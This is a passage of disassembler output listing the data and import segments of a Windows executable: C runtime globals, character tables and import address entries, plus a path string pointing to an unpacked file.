dword_4E64DC dd 0 ; DATA XREF: sub_4151C6+1E3�w
dword_4E64E0 dd 0 ; DATA XREF: sub_4151C6+1EB�w
word_4E64E4 dw 0 ; DATA XREF: sub_4151C6+244�w
word_4E64E6 dw 0 ; DATA XREF: sub_4151C6+22C�w
word_4E64E8 dw 0 ; DATA XREF: sub_4151C6+256�w
word_4E64EA dw 0 ; DATA XREF: sub_4151C6+1F7�w
dword_4E64EC dd 101h dup(0) ; DATA XREF: sub_4151C6+265�o
dword_4E68F0 dd 0 ; DATA XREF: sub_401CC7+1A14�w
; sub_401CC7+2F5B�r ...
align 10h
byte_4E6900 db 0 ; DATA XREF: sub_4156AF+244�o
; sub_4156AF+253�w ...
byte_4E6901 db 0 ; DATA XREF: sub_4156AF+267�w
word_4E6902 dw 0 ; DATA XREF: sub_4156AF+298�w
word_4E6904 dw 0 ; DATA XREF: sub_4156AF+27F�w
; sub_4156AF:loc_415A75�w
word_4E6906 dw 0 ; DATA XREF: sub_4156AF+29E�w
byte_4E6908 db 0 ; DATA XREF: sub_4156AF+28B�w
byte_4E6909 db 0 ; DATA XREF: sub_4156AF+260�w
word_4E690A dw 0 ; DATA XREF: sub_4156AF+3E6�w
; sub_4156AF+410�w
dword_4E690C dd 0 ; DATA XREF: sub_4156AF:loc_41596C�w
; sub_4156AF+38E�r
dword_4E6910 dd 0 ; DATA XREF: sub_4156AF+2CA�w
word_4E6914 dw 0 ; DATA XREF: sub_4156AF+388�w
; sub_4156AF+3DC�o
word_4E6916 dw 0 ; DATA XREF: sub_4156AF+329�w
; sub_4156AF+34E�r ...
dword_4E6918 dd 0 ; DATA XREF: sub_4156AF+300�w
; sub_4156AF+3CD�w
dword_4E691C dd 0 ; DATA XREF: sub_4156AF+31C�w
; sub_4156AF+39F�w ...
byte_4E6920 db 0 ; DATA XREF: sub_4156AF+305�r
; sub_4156AF+313�w
byte_4E6921 db 0 ; DATA XREF: sub_4156AF+2CF�w
; sub_4156AF+398�w ...
word_4E6922 dw 0 ; DATA XREF: sub_4156AF+2DD�w
word_4E6924 dw 0 ; DATA XREF: sub_4156AF+3ED�w
; sub_4156AF+41E�w
word_4E6926 dw 0 ; DATA XREF: sub_4156AF+322�w
word_4E6928 dw 0 ; DATA XREF: sub_4156AF+354�w
; sub_4156AF+426�o
word_4E692A dw 0 ; DATA XREF: sub_4156AF+363�w
; sub_4156AF+3FD�w
dword_4E692C dd 0 ; DATA XREF: sub_4156AF+35D�w
dd 2 dup(0)
dword_4E6938 dd 0 ; DATA XREF: sub_4156AF+393�w
; sub_4156AF+40B�o
dword_4E693C dd 0 ; DATA XREF: sub_4156AF+32F�w
byte_4E6940 db 0 ; DATA XREF: sub_4156AF+335�w
byte_4E6941 db 0 ; DATA XREF: sub_4156AF+33B�w
word_4E6942 dw 0 ; DATA XREF: sub_4156AF+348�w
dword_4E6944 dd 7 dup(0) ; DATA XREF: sub_4156AF+3E1�o
dword_4E6960 dd 0 ; DATA XREF: sub_4156AF+30�w
; sub_4156AF+42F�r
; char byte_4E6964[]
byte_4E6964 db 404h dup(0) ; DATA XREF: sub_4156AF+1C0�o
; sub_4156AF+472�o
; char byte_4E6D68[]
byte_4E6D68 db 4000h dup(0) ; DATA XREF: sub_415C3F+1D�o
; .text:00415D29�o ...
; char byte_4EAD68[]
byte_4EAD68 db 4 dup(0) ; DATA XREF: sub_415C3F+13�o
; .text:00415D70�o ...
dword_4EAD6C dd 0 ; DATA XREF: sub_416159+F�r
; sub_416352+12�r
dd 2 dup(0)
dword_4EAD78 dd 0 ; DATA XREF: .data:0044D448�o
dword_4EAD7C dd 0 ; DATA XREF: .data:0044D460�o
dword_4EAD80 dd 0 ; DATA XREF: .data:0044D478�o
dword_4EAD84 dd 0 ; DATA XREF: .data:0044D490�o
dword_4EAD88 dd 0 ; DATA XREF: .data:0044D4A8�o
dword_4EAD8C dd 0 ; DATA XREF: .data:0044D4C0�o
dword_4EAD90 dd 0 ; DATA XREF: .data:0044D4D8�o
dword_4EAD94 dd 0 ; DATA XREF: .data:0044D4F0�o
dword_4EAD98 dd 0 ; DATA XREF: .data:0044D508�o
dword_4EAD9C dd 0 ; DATA XREF: .data:0044D520�o
dword_4EADA0 dd 0 ; DATA XREF: .data:0044D538�o
dword_4EADA4 dd 0 ; DATA XREF: .data:0044D550�o
dword_4EADA8 dd 0 ; DATA XREF: .data:0044D568�o
dword_4EADAC dd 0 ; DATA XREF: .data:0044D598�o
dword_4EADB0 dd 0 ; DATA XREF: .data:0044D5B0�o
dword_4EADB4 dd 0 ; DATA XREF: .data:0044D5C8�o
dword_4EADB8 dd 0 ; DATA XREF: .data:0044D5E0�o
dword_4EADBC dd 0 ; DATA XREF: .data:0044D5F8�o
dword_4EADC0 dd 0 ; DATA XREF: .data:0044D610�o
dword_4EADC4 dd 0 ; DATA XREF: .data:0044D628�o
dword_4EADC8 dd 2 dup(0) ; DATA XREF: .data:0044D640�o
dword_4EADD0 dd 2 dup(0) ; DATA XREF: sub_4167BF:loc_416852�o
dword_4EADD8 dd 0 ; DATA XREF: sub_416F62+431�o
dword_4EADDC dd 0Eh dup(0) ; DATA XREF: sub_41748B+F�o
; char byte_4EAE14[]
byte_4EAE14 db 200h dup(0) ; DATA XREF: sub_41815A+41�o
; wchar_t word_4EB014
word_4EB014 dw 0 ; DATA XREF: sub_417A8B+C7�o
; sub_417DE6+DD�o ...
align 4
dd 1FFh dup(0)
; wchar_t word_4EB814
word_4EB814 dw 0 ; DATA XREF: sub_417A8B+D6�o
; sub_417DE6+F4�o ...
align 4
dd 1FFh dup(0)
dword_4EC014 dd 0 ; DATA XREF: sub_417A8B+86�w
; sub_417C5D+94�r
dword_4EC018 dd 0 ; DATA XREF: sub_417A8B+A7�w
; sub_4180C3+55�r ...
dword_4EC01C dd 0 ; DATA XREF: sub_417A8B+A0�w
; sub_417C5D+D6�r ...
dword_4EC020 dd 0 ; DATA XREF: sub_417A8B+79�w
; sub_417C5D+35�r ...
; char byte_4EC024[]
byte_4EC024 db 200h dup(0) ; DATA XREF: sub_4180C3+5E�o
dword_4EC224 dd 0 ; DATA XREF: sub_417A8B+93�w
; sub_417C5D+A2�r
dd 0
dword_4EC22C dd 0 ; DATA XREF: sub_417A8B+E7�o
; sub_417A8B+103�r ...
dword_4EC230 dd 0 ; DATA XREF: sub_417DE6+17B�w
; sub_417F8D+107�w
; void *Src
Src dd 0 ; DATA XREF: sub_417DE6+180�w
; sub_417F8D+10D�w ...
dword_4EC238 dd 0 ; DATA XREF: sub_417DE6+159�w
; sub_4180C3+4F�r
align 10h
dword_4EC240 dd 0 ; DATA XREF: sub_41842D+22�w
; sub_41842D:loc_4185B2�w ...
dword_4EC244 dd 0 ; DATA XREF: sub_401CC7+3CBD�o
; sub_4182F9+12�o ...
dd 0
dword_4EC24C dd 0 ; DATA XREF: sub_41842D+1C�r
; sub_4185D2+3A�r
dd 7Fh dup(0)
dword_4EC44C dd 0 ; DATA XREF: sub_41842D+28�r
; sub_4185D2+4A�w
dd 1944h dup(0)
dword_4F2960 dd 0 ; DATA XREF: sub_4185D2+23�o
dword_4F2964 dd 0 ; DATA XREF: sub_401CC7+3CDB�o
; sub_4182F9+3C�o ...
dword_4F2968 dd 0 ; DATA XREF: .data:0044F33C�o
dword_4F296C dd 0 ; DATA XREF: .data:0044F344�o
dword_4F2970 dd 0 ; DATA XREF: .data:0044F348�o
dword_4F2974 dd 0 ; DATA XREF: .data:0044F34C�o
dword_4F2978 dd 0 ; DATA XREF: .data:0044F350�o
dword_4F297C dd 0 ; DATA XREF: .data:0044F36C�o
dword_4F2980 dd 0 ; DATA XREF: .data:0044F374�o
dword_4F2984 dd 0 ; DATA XREF: .data:0044F378�o
dword_4F2988 dd 0 ; DATA XREF: .data:0044F384�o
dword_4F298C dd 0 ; DATA XREF: .data:0044F388�o
dword_4F2990 dd 0 ; DATA XREF: .data:0044F390�o
; char byte_4F2994[]
byte_4F2994 db 204h dup(0) ; DATA XREF: sub_418E65+6A�o
dword_4F2B98 dd 0 ; DATA XREF: sub_4190F6+E9�o
; char byte_4F2B9C[]
byte_4F2B9C db 5Ch dup(0) ; DATA XREF: sub_4196AA:loc_4197C7�o
; sub_4196AA+131�o ...
; char byte_4F2BF8[]
byte_4F2BF8 db 200h dup(0) ; DATA XREF: sub_41A460+7C�o
; sub_41A460+A5�o
dword_4F2DF8 dd 0 ; DATA XREF: sub_419A25+45�w
; sub_419A25+4D�r ...
; char byte_4F2DFC[]
byte_4F2DFC db 5Ch dup(0) ; DATA XREF: sub_41A32C:loc_41A44E�o
; sub_41A32C+12D�o
; char byte_4F2E58[]
byte_4F2E58 db 200h dup(0) ; DATA XREF: sub_419965+4C�o
; sub_419965+7E�o ...
byte_4F3058 db 0 ; DATA XREF: sub_419A25+29�r
; sub_419A25+34�w
align 4
; char byte_4F305C[]
byte_4F305C db 200h dup(0) ; DATA XREF: sub_419C7C+61�o
; sub_419C7C+89�o ...
; char byte_4F325C[]
byte_4F325C db 204h dup(0) ; DATA XREF: sub_41958E:loc_4195C6�o
; sub_41958E+5B�o
dword_4F3460 dd 0 ; DATA XREF: sub_41A901:loc_41A922�r
; sub_41A9F0+54�r ...
dword_4F3464 dd 0 ; DATA XREF: sub_41A901�r
; sub_41A9F0+37�r ...
dword_4F3468 dd 0 ; DATA XREF: sub_41A931+1A�r
; sub_41AB45+83�o
dword_4F346C dd 0 ; DATA XREF: sub_41A901:loc_41A915�r
; sub_41AB45+11B�w
; char byte_4F3470[]
byte_4F3470 db 34h dup(0) ; DATA XREF: sub_41A9F0+13�o
; sub_41AB45:loc_41AC86�o
; int dword_4F34A4
dword_4F34A4 dd 0 ; DATA XREF: sub_41A9F0+CD�r
; sub_41A9F0+EC�r ...
dd 0
; char byte_4F34AC[]
byte_4F34AC db 4 dup(0) ; DATA XREF: sub_41A969+9�o
dword_4F34B0 dd 0 ; DATA XREF: sub_41AB45+DF�o
; char byte_4F34B4[]
byte_4F34B4 db 4 dup(0) ; DATA XREF: sub_41AB45:loc_41AC81�o
; char byte_4F34B8[]
byte_4F34B8 db 38h dup(0) ; DATA XREF: sub_41B76F+47�o
dword_4F34F0 dd 0 ; DATA XREF: sub_41B92C+13�o
dword_4F34F4 dd 941E90h ; DATA XREF: __heap_alloc_dbg+262�w
; _realloc_help:loc_41CA8B�r ...
dword_4F34F8 dd 1545h ; DATA XREF: __heap_alloc_dbg:loc_41C3F3�r
; __heap_alloc_dbg+21C�w ...
dword_4F34FC dd 943230h ; DATA XREF: __heap_alloc_dbg:loc_41C429�r
; __heap_alloc_dbg+252�r ...
dword_4F3500 dd 118Ah ; DATA XREF: __heap_alloc_dbg+222�r
; __heap_alloc_dbg+22A�w ...
dword_4F3504 dd 118Ah ; DATA XREF: __heap_alloc_dbg+235�r
; __heap_alloc_dbg+243�w ...
dword_4F3508 dd 0 ; DATA XREF: __sopen+217�r
dword_4F350C dd 0A28h ; DATA XREF: sub_41D910:loc_41D97A�r
; sub_41D910:loc_41D9ED�r ...
dword_4F3510 dd 501h ; DATA XREF: start+64�w
dword_4F3514 dd 5 ; DATA XREF: start+4F�w start+55�r
dword_4F3518 dd 1 ; DATA XREF: start+3E�w start+5E�r
dword_4F351C dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_401710�r
; __setargv+C6�w
dword_4F3520 dd 942840h ; DATA XREF: WinMain(x,x,x,x)+2FE�r
; WinMain(x,x,x,x)+31E�r ...
align 8
dword_4F3528 dd 942888h ; DATA XREF: __setenvp+7B�w
; __setenvp+81�r ...
dword_4F352C dd 0 ; DATA XREF: ___crtsetenv+49�r
dword_4F3530 dd 0 ; DATA XREF: _getenv+24�r
; ___wtomb_environ+6�r ...
align 8
off_4F3538 dd offset aCM_unpackerPac ; DATA XREF: __setargv+26�w
; __setargv+3C�r
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_4F3540 db 0 ; DATA XREF: _doexit+30�w
; ___endstdio+8�r
align 4
dword_4F3544 dd 0 ; DATA XREF: _doexit:loc_41EBA3�w
dword_4F3548 dd 0 ; DATA XREF: _doexit+9�r
; _doexit:loc_41EC4B�w
dword_4F354C dd 0 ; DATA XREF: _doexit+95�r _doexit+AF�w
dword_4F3550 dd 0 ; DATA XREF: .text:00420424�r
; .text:0042042F�w
dword_4F3554 dd 0 ; DATA XREF: __fpmath+10�w
dword_4F3558 dd 0 ; DATA XREF: _time+88�r _time+F8�w
align 10h
dword_4F3560 dd 0 ; DATA XREF: _time+7D�r _time+100�w ...
byte_4F3564 db 2 dup(0) ; DATA XREF: _time+109�w
word_4F3566 dw 0 ; DATA XREF: _time+52�r
dword_4F3568 dd 0 ; DATA XREF: _time+3D�r _time+112�w ...
dword_4F356C dd 0 ; DATA XREF: _time+11A�w
dword_4F3570 dd 0 ; DATA XREF: start+C3�w __setenvp+1B�r ...
align 8
dword_4F3578 dd 0 ; DATA XREF: __amsg_exit+3�r
; _fast_error_exit+3�r ...
dword_4F357C dd 0 ; DATA XREF: __openfile:loc_427CF5�r
; __openfile+2CE�w ...
dword_4F3580 dd 0 ; DATA XREF: __CrtDbgReport+93�r
; __CrtDbgReport+C8�w ...
dword_4F3584 dd 0 ; DATA XREF: _malloc+A�r
; __malloc_dbg+10�r ...
dword_4F3588 dd 0 ; DATA XREF: _set_new_handler(int (*)(uint))+E�r
; _set_new_handler(int (*)(uint))+19�w ...
align 10h
dword_4F3590 dd 143E28h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_451C04�o
dword_4F35A8 dd 143DB0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_451C44�o
dword_4F35C0 dd 143E00h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_451C24�o
dword_4F35D8 dd 143DD8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:off_451C34�o
dword_4F35F0 dd 0 ; DATA XREF: ___sbh_decommit_pages+8B�r
; ___sbh_decommit_pages+93�w ...
dword_4F35F4 dd 1 ; DATA XREF: __setmbcp:loc_429622�r
; _getSystemCP+3�w ...
dword_4F35F8 dd 0 ; DATA XREF: __stbuf+A6�r __stbuf+C9�w ...
align 10h
dword_4F3600 dd 0 ; DATA XREF: __strcmpi+C�o
; __setlocale_set_cat+82�r ...
align 8
; int dword_4F3608
dword_4F3608 dd 0 ; DATA XREF: __strupr+D�r
; __strupr:loc_421916�r ...
dword_4F360C dd 0 ; DATA XREF: ___init_monetary+4�r
dword_4F3610 dd 0 ; DATA XREF: ___init_numeric+18�r
dword_4F3614 dd 0 ; DATA XREF: ___init_time+4�r
dword_4F3618 dd 0 ; DATA XREF: __mbstowcs_lk+B9�r
; __mbstowcs_lk+16C�r ...
dword_4F361C dd 0 ; DATA XREF: __setlocale_set_cat+11F�w
dword_4F3620 dd 0 ; DATA XREF: __expandlocale+C7�o
; __expandlocale+140�o
word_4F3624 dw 0 ; DATA XREF: __expandlocale+E8�r
align 4
dword_4F3628 dd 0 ; DATA XREF: __expandlocale+EF�w
; __expandlocale+159�o
dword_4F362C dd 1 ; DATA XREF: ___crtLCMapStringA+26�r
; ___crtLCMapStringA+4B�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+19�o
; __setargv+26�o ...
align 4
dd 3Ah dup(0)
dword_4F3734 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+14�r
; ___crtGetEnvironmentStringsA+2C�w ...
dword_4F3738 dd 0 ; DATA XREF: __FF_MSGBANNER+2B�r
; __FF_MSGBANNER+34�r
dword_4F373C dd 0 ; DATA XREF: .text:loc_430826�r
; .text:00430832�w ...
dword_4F3740 dd 0 ; DATA XREF: .text:loc_43083A�r
; .text:00430845�w ...
dword_4F3744 dd 0 ; DATA XREF: .text:loc_43084D�r
; .text:00430859�w ...
dword_4F3748 dd 0 ; DATA XREF: .text:loc_430860�r
; .text:0043086C�w ...
dword_4F374C dd 0 ; DATA XREF: .text:loc_4307BA�r
; .text:004307D5�w
dword_4F3750 dd 0 ; DATA XREF: ___crtMessageBoxA+D�r
; ___crtMessageBoxA+39�w ...
dword_4F3754 dd 0 ; DATA XREF: ___crtMessageBoxA+5A�w
; ___crtMessageBoxA:loc_430D73�r ...
dword_4F3758 dd 0 ; DATA XREF: ___crtMessageBoxA+6E�w
; ___crtMessageBoxA+8B�r ...
dword_4F375C dd 1 ; DATA XREF: ___crtGetStringTypeA+26�r
; ___crtGetStringTypeA+46�w ...
dword_4F3760 dd 0 ; DATA XREF: __openfile+9�r
; int (__stdcall *dword_4F3764)()
dword_4F3764 dd 77C26E79h ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):loc_43316E�r
; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+37�r ...
dword_4F3768 dd 0 ; DATA XREF: __tzset_lk+17�w
; __tzset_lk+6D�w ...
align 10h
dword_4F3770 dd 0 ; DATA XREF: __tzset_lk+59�o
; __tzset_lk+77�r
dword_4F3774 dd 10h dup(0) ; DATA XREF: __tzset_lk+103�o
word_4F37B4 dw 0 ; DATA XREF: sub_4336D0+FC�r
word_4F37B6 dw 0 ; DATA XREF: __tzset_lk+88�r
; sub_4336D0+145�r ...
word_4F37B8 dw 0 ; DATA XREF: sub_4336D0+132�r
word_4F37BA dw 0 ; DATA XREF: sub_4336D0+13B�r
; sub_4336D0+18B�r
word_4F37BC dw 0 ; DATA XREF: sub_4336D0+126�r
; sub_4336D0+181�r
word_4F37BE dw 0 ; DATA XREF: sub_4336D0+11C�r
; sub_4336D0+177�r
word_4F37C0 dw 0 ; DATA XREF: sub_4336D0+113�r
; sub_4336D0+16E�r
word_4F37C2 dw 0 ; DATA XREF: sub_4336D0+109�r
; sub_4336D0+164�r
dword_4F37C4 dd 0 ; DATA XREF: __tzset_lk+93�r
; __tzset_lk+CE�r
dword_4F37C8 dd 10h dup(0) ; DATA XREF: __tzset_lk+149�o
word_4F3808 dw 0 ; DATA XREF: sub_4336D0+43�r
word_4F380A dw 0 ; DATA XREF: __tzset_lk+AB�r
; sub_4336D0+8C�r ...
word_4F380C dw 0 ; DATA XREF: sub_4336D0+79�r
word_4F380E dw 0 ; DATA XREF: sub_4336D0+82�r
; sub_4336D0+D2�r
word_4F3810 dw 0 ; DATA XREF: sub_4336D0+6D�r
; sub_4336D0+C8�r
word_4F3812 dw 0 ; DATA XREF: sub_4336D0+63�r
; sub_4336D0+BE�r
word_4F3814 dw 0 ; DATA XREF: sub_4336D0+5A�r
; sub_4336D0+B5�r
word_4F3816 dw 0 ; DATA XREF: sub_4336D0+50�r
; sub_4336D0+AB�r
dword_4F3818 dd 0 ; DATA XREF: __tzset_lk+B6�r
; __tzset_lk+C9�r
; char *dword_4F381C
dword_4F381C dd 0 ; DATA XREF: __tzset_lk+18D�r
; __tzset_lk+196�r ...
dword_4F3820 dd 0 ; DATA XREF: ___tzset+3�r ___tzset+16�r ...
dword_4F3824 dd 0 ; DATA XREF: ___init_time+75�r
; ___init_time+86�r ...
dword_4F3828 dd 0 ; DATA XREF: ___init_numeric+25�o
; ___init_numeric+93�r ...
dword_4F382C dd 0 ; DATA XREF: ___init_numeric+42�o
; ___init_numeric+A3�r ...
dword_4F3830 dd 0 ; DATA XREF: ___init_numeric+5F�o
; ___init_numeric+7C�r ...
dword_4F3834 dd 0 ; DATA XREF: ___init_monetary+A0�r
; ___init_monetary+B1�r ...
dword_4F3838 dd 0 ; DATA XREF: unknown_libname_28+2AA�r
; unknown_libname_28+2B5�r ...
dword_4F383C dd 0 ; DATA XREF: unknown_libname_28+2CC�r
; unknown_libname_28+2D7�r ...
dword_4F3840 dd 3 dup(0) ; DATA XREF: __setlocale_set_cat+94�o
; __setlocale_set_cat+F3�o
word_4F384C dw 0 ; DATA XREF: unknown_libname_28+36�r
align 10h
dd 0
word_4F3854 dw 0 ; DATA XREF: __get_lc_lconv+F�r
align 4
db 2 dup(0)
word_4F385A dw 0 ; DATA XREF: ___init_numeric+F�r
db 2 dup(0)
word_4F385E dw 0 ; DATA XREF: __get_lc_time+F�r
word_4F3860 dw 0 ; DATA XREF: __get_lc_time+1A�r
align 4
dword_4F3864 dd 0 ; DATA XREF: ___get_qualified_locale+155�r
; ___get_qualified_locale+176�r ...
dword_4F3868 dd 0 ; DATA XREF: _GetLcidFromLangCountry+37�w
; LangCountryEnumProc(x)+1B�r ...
; size_t MaxCount
MaxCount dd 0 ; DATA XREF: _GetLcidFromLangCountry+6E�w
; LangCountryEnumProc(x)+101�r ...
dword_4F3870 dd 0 ; DATA XREF: _GetLcidFromLangCountry+1A�w
; _GetLcidFromLangCountry+47�r ...
; char *dword_4F3874
dword_4F3874 dd 0 ; DATA XREF: ___get_qualified_locale+45�w
; ___get_qualified_locale+4B�r ...
; char *dword_4F3878
dword_4F3878 dd 0 ; DATA XREF: ___get_qualified_locale+7A�w
; ___get_qualified_locale+80�r ...
dword_4F387C dd 0 ; DATA XREF: ___get_qualified_locale:loc_4351B9�w
; ___get_qualified_locale:loc_43521E�r ...
dword_4F3880 dd 0 ; DATA XREF: ___get_qualified_locale+182�r
; ___get_qualified_locale+1CB�r ...
dword_4F3884 dd 0 ; DATA XREF: ___get_qualified_locale+6�r
; ___get_qualified_locale+2C�w ...
dword_4F3888 dd 0 ; DATA XREF: __sopen:loc_43179C�r
byte_4F388C db 0 ; DATA XREF: sub_438C60+18F�o
; sub_438C60+1F2�r ...
align 10h
dd 0
dword_4F3894 dd 0 ; DATA XREF: __free_lc_lconv+11�o
; .data:off_454EFC�o ...
dword_4F3898 dd 0 ; DATA XREF: ___crtGetStringTypeW+26�r
; ___crtGetStringTypeW+46�w ...
dword_4F389C dd 0 ; DATA XREF: ___crtGetLocaleInfoW+26�r
; ___crtGetLocaleInfoW+41�w ...
dword_4F38A0 dd 0 ; DATA XREF: ___crtGetLocaleInfoA+26�r
; ___crtGetLocaleInfoA+41�w ...
dword_4F38A4 dd 0 ; DATA XREF: ___crtCompareStringA+26�r
; ___crtCompareStringA+4B�w ...
dword_4F38A8 dd 0 ; DATA XREF: ___crtLCMapStringW+26�r
; ___crtLCMapStringW+4B�w ...
byte_4F38AC db 1 ; DATA XREF: sub_40E2B4�r sub_40E2B4+9�w
align 10h
dword_4F38B0 dd 0 ; DATA XREF: sub_437DE0+90�w
; sub_437DE0+A5�w ...
dword_4F38B4 dd 0 ; DATA XREF: sub_437F70+1C4�w
; sub_437F70+1ED�w ...
align 10h
dword_4F38C0 dd 941F58h ; DATA XREF: ___initstdio+ED�r
; ___initstdio+109�r ...
dd 3Fh dup(0)
dword_4F39C0 dd 20h ; DATA XREF: __close+7�r __read+7�r ...
dword_4F39C4 dd 0 ; DATA XREF: __strcmpi+5A�r
; __strupr+68�r ...
dword_4F39C8 dd 0 ; DATA XREF: __strcmpi:loc_4211C3�w
; __strcmpi:loc_4211D7�w ...
dword_4F39CC dd 4E4h ; DATA XREF: __setmbcp+22�r
; __setmbcp+14A�w ...
word_4F39D0 dw 0 ; DATA XREF: __setmbcp+19A�w
; __setmbcp+2F3�w ...
align 4
dd 2 dup(0)
dword_4F39DC dd 0 ; DATA XREF: __setmbcp+150�w
; __setmbcp+2C2�w ...
byte_4F39E0 db 0 ; DATA XREF: _setSBUpLow+1CE�w
; _setSBUpLow+21A�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4F3AE0 db 0 ; DATA XREF: __setmbcp+AB�w
; __setmbcp+1F4�w ...
byte_4F3AE1 db 0 ; DATA XREF: __splitpath+92�r
; __setmbcp+129�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4F3BE4 dd 0 ; DATA XREF: __setmbcp+169�w
; __setmbcp+205�w ...
dword_4F3BE8 dd 940000h ; DATA XREF: sub_41D910+8D�r
; sub_41D910+FB�r ...
dword_4F3BEC dd 1 ; DATA XREF: sub_41D910:loc_41D941�r
; sub_41D910:loc_41D9AE�r ...
dword_4F3BF0 dd 0 ; DATA XREF: ___sbh_heap_init+51�w
; ___sbh_alloc_new_region+9�r ...
dword_4F3BF4 dd 0 ; DATA XREF: sub_424410+484�r
; sub_424410+4B3�r ...
dword_4F3BF8 dd 0 ; DATA XREF: ___sbh_heap_init+37�w
; sub_424410+5C1�w ...
align 10h
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init+3D�w
; sub_424410+477�r ...
dword_4F3C04 dd 0 ; DATA XREF: ___sbh_heap_init+47�w
; ___sbh_find_block+6�r ...
dword_4F3C08 dd 0 ; DATA XREF: ___sbh_heap_init+16�w
; ___sbh_heap_init+1B�r ...
dword_4F3C0C dd 0 ; DATA XREF: __heap_alloc_base+2F�r
; sub_423880+6D�r ...
dword_4F3C10 dd 0 ; DATA XREF: .text:00422854�r
; .text:0042285F�w ...
dword_4F3C14 dd 943250h ; DATA XREF: ___initstdio+48�w
; ___initstdio+4D�r ...
align 10h
dword_4F3C20 dd 400h dup(0) ; DATA XREF: .data:off_451958�o
; .data:00451960�o
dword_4F4C20 dd 200h ; DATA XREF: ___initstdio+4�r
; ___initstdio+D�w ...
dword_4F4C24 dd 142340h ; DATA XREF: start+B9�w
; __wincmdln:loc_42F442�r ...
dword_4F4C28 dd 1 ; DATA XREF: __setenvp+13B�w _getenv+E�r
dword_4F4C2C dd 1 ; DATA XREF: ___initmbctable+3�r
; ___initmbctable+16�w ...
dword_4F4C30 dd 94241Ch ; DATA XREF: _doexit+45�r __onexit+19�r ...
dword_4F4C34 dd 942410h ; DATA XREF: _doexit+3C�r _doexit+5A�r ...
dword_4F4C38 dd 0 ; DATA XREF: .text:0041DB74�r
; .text:0041DB7F�w ...
byte_4F4C3C db 1 ; DATA XREF: sub_43AB40+5�r
; sub_43AB40+11�r ...
_data ends
; Section 4. (virtual address 000F5000)
; Virtual size : 00000F4E ( 3918.)
; Section size in file : 00000F4E ( 3918.)
; Offset to raw data for section: 000F5000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 4F5000h
dd 0F5270h, 2 dup(0)
dd 0F556Eh, 0F54F4h, 0F5278h, 2 dup(0)
dd 0F5584h, 0F54FCh, 0F5050h, 2 dup(0)
dd 0F5F40h, 0F52D4h, 5 dup(0)
dd 0F598Eh, 0F5F26h, 0F5F14h, 0F5F02h, 0F5EF0h, 0F5EE0h
dd 0F5ECAh, 0F5EB4h, 0F5EA2h, 0F5E92h, 0F5E82h, 0F5E64h
dd 0F5E52h, 0F5E40h, 0F5E2Ch, 0F5E1Ch, 0F5E0Eh, 0F5DFCh
dd 0F5DE2h, 0F5DCAh, 0F5DB0h, 0F5D96h, 0F5D7Ah, 0F5D6Ah
dd 0F5D5Ah, 0F5590h, 0F559Eh, 0F55ACh, 0F55BEh, 0F55D4h
dd 0F55EAh, 0F55F2h, 0F5602h, 0F5610h, 0F561Eh, 0F5634h
dd 0F5644h, 0F5650h, 0F5666h, 0F567Ch, 0F5690h, 0F56A6h
dd 0F56B6h, 0F56C6h, 0F56D8h, 0F56E8h, 0F56F4h, 0F5704h
dd 0F5716h, 0F572Ah, 0F573Ch, 0F574Ch, 0F575Ah, 0F5772h
dd 0F578Ah, 0F57B2h, 0F57CAh, 0F57D6h, 0F57E6h, 0F57F2h
dd 0F5800h, 0F5814h, 0F5826h, 0F583Ah, 0F5848h, 0F585Ah
dd 0F586Ch, 0F587Ah, 0F5886h, 0F589Eh, 0F58B8h, 0F58C8h
dd 0F58DAh, 0F58ECh, 0F5904h, 0F591Eh, 0F593Ah, 0F594Ah
dd 0F5964h, 0F5980h, 0F59A8h, 0F59B4h, 0F59C0h, 0F59D2h
dd 0F59E4h, 0F59F8h, 0F5A08h, 0F5A1Ah, 0F5A2Ah, 0F5A38h
dd 0F5A4Ah, 0F5A5Ah, 0F5A70h, 0F5A7Eh, 0F5A8Ch, 0F5AA8h
dd 0F5ABEh, 0F5AD4h, 0F5AE0h, 0F5AF6h, 0F5B06h, 0F5B1Ah
dd 0F5B30h, 0F5B40h, 0F5B50h, 0F5B60h, 0F5B6Ch, 0F5B86h
dd 0F5B96h, 0F5BAEh, 0F5BC6h, 0F5BD8h, 0F5BEAh, 0F5BF8h
dd 0F5C06h, 0F5C16h, 0F5C2Ch, 0F5C48h, 0F5C58h, 0F5C66h
dd 0F5C74h, 0F5C84h, 0F5C9Eh, 0F5CACh, 0F5CBAh, 0F5CD0h
